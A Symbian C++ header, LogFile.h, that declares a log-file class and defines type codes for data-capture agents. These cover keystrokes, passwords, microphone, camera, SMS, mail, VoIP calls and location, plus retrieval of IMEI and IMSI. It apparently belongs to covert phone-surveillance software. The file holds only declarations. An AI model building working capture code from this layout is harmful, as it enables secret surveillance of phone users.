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Test Coverage
 Name        : LogFile.h
 Author      : Marco Bellino
 Version     : 1.0
 Copyright   : Your copyright notice
 Description : CLogFile declaration

#ifndef LOGFILE_H
#define LOGFILE_H


#include <e32std.h>
#include <e32base.h>
#include <f32file.h>

#include "Keys.h"

#include <HT\Phone.h>

#define LOG_DELIMITER             0xABADC0DE

#define LOGTYPE_UNKNOWN            0xFFFF    // in caso di errore
#define LOGTYPE_FILEOPEN        0x0000
#define LOGTYPE_FILECAPTURE        0x0001    // in realta' e' 0x0000 e si distingue tra LOG e LOGF
#define LOGTYPE_KEYLOG            0x0040
#define LOGTYPE_PRINT            0x0100
#define LOGTYPE_SNAPSHOT        0xB9B9 // Snapshot Agent
#define LOGTYPE_UPLOAD            0xD1D1    
#define LOGTYPE_DOWNLOAD        0xD0D0    
#define LOGTYPE_CALL            0x0140 // Call Agent
#define LOGTYPE_CALL_SKYPE        0x0141
#define LOGTYPE_CALL_GTALK        0x0142
#define LOGTYPE_CALL_YMSG        0x0143
#define LOGTYPE_CALL_MSN        0x0144
#define LOGTYPE_CALL_MOBILE        0x0145
#define LOGTYPE_CALL_SKYPE_NEW        0x0146
#define LOGTYPE_URL            0x0180
#define LOGTYPE_URLCAPTURE        0x0181
#define LOGTYPE_CLIPBOARD        0xD9D9
#define LOGTYPE_PASSWORD        0xFAFA // Password Agent
#define LOGTYPE_MIC            0xC2C2       // Microphone Agent    
#define LOGTYPE_CHAT            0xC6C6
#define LOGTYPE_CHAT_SKYPE        0x0300
#define LOGTYPE_CAMERA            0xE9E9 // Webcam e Phone Camera Agent
#define LOGTYPE_APPLICATION        0x1011 // Application Agent
#define LOGTYPE_ADDRESSBOOK        0x0200 // Addressbook Windows Mobile
#define LOGTYPE_iADDRESSBOOK        0x0250 // Addressbook iPhone
#define LOGTYPE_CALENDAR        0x0201 // Calendar Agent
#define LOGTYPE_TASK            0x0202 // Tasks
#define LOGTYPE_MAIL_RAW        0x1001
#define LOGTYPE_MAIL            0x0210 // Mail Agent
#define LOGTYPE_SMS                0x0211 // SMS Agent
#define LOGTYPE_MMS                0x0212 // MMS Agent
#define LOGTYPE_LOCATION        0x0220 // Location Agent
#define LOGTYPE_CALLLIST        0x0230 // Call list Agent
#define LOGTYPE_DEVICE            0x0240 // Device info Agent
#define LOGTYPE_INFO            0x0241 // Info Log
#define LOGTYPE_MOUSE            0x0280 // Mouse click agent
#define LOGTYPE_LOCATION_NEW    0x1220
    // sub-types di LOGTYPE_LOCATION_NEW
        #define LOGTYPE_LOCATION_GPS    0x0001
        #define LOGTYPE_LOCATION_GSM    0x0002
        #define LOGTYPE_LOCATION_WIFI   0x0003
        #define LOGTYPE_LOCATION_IP     0x0004
        #define LOGTYPE_LOCATION_CDMA   0x0005
#define LOGTYPE_FILESYSTEM        0xEDA1


 *  CLogFile
class CLogFile : public CBase
    // Constructors and destructor

     * Destructor.
    IMPORT_C ~CLogFile();

     * Two-phased constructor.
    IMPORT_C static CLogFile* NewL(RFs& aFs);

     * Two-phased constructor.
    IMPORT_C static CLogFile* NewLC(RFs& aFs);

     * Methods for Logs management
    IMPORT_C void CreateLogL(TInt aLogId);
    IMPORT_C void CreateLogL(TInt alogId,TAny* aAdditionalData);
    IMPORT_C void AppendLogL(const TDesC8& aData);
    IMPORT_C void CloseLogL();
     * Methods for Markup management
    IMPORT_C void WriteMarkupL(TInt aId, const TDesC8& aData);
    IMPORT_C TBool ExistsMarkupL(TInt aId);
    IMPORT_C HBufC8* ReadMarkupL(TInt aId);
    IMPORT_C HBufC8* CLogFile::DecryptMarkupL(RFs& fs,const TDesC& fname);
     * Method for LogInfo messages
    //void LogInfoL(const TDesC& aLogInfoMsg);
    void RetrieveImeiAndImsiL();
    //TInt64 GetFiletime();

     * Constructor for performing 1st stage construction
    CLogFile(RFs& aFs);

     * EPOC default constructor for performing 2nd stage construction
    void ConstructL();

    RFile iFile;
    TBool iOpened;
    TBool iContainsData;
    RFs& iFs;
    TBuf<CTelephony::KPhoneSerialNumberSize> iImei;
    TBuf<CTelephony::KIMSISize> iImsi;
    TInt iLogId;    // Useful for naming the log file using a meaning name.

#endif // LOGFILE_H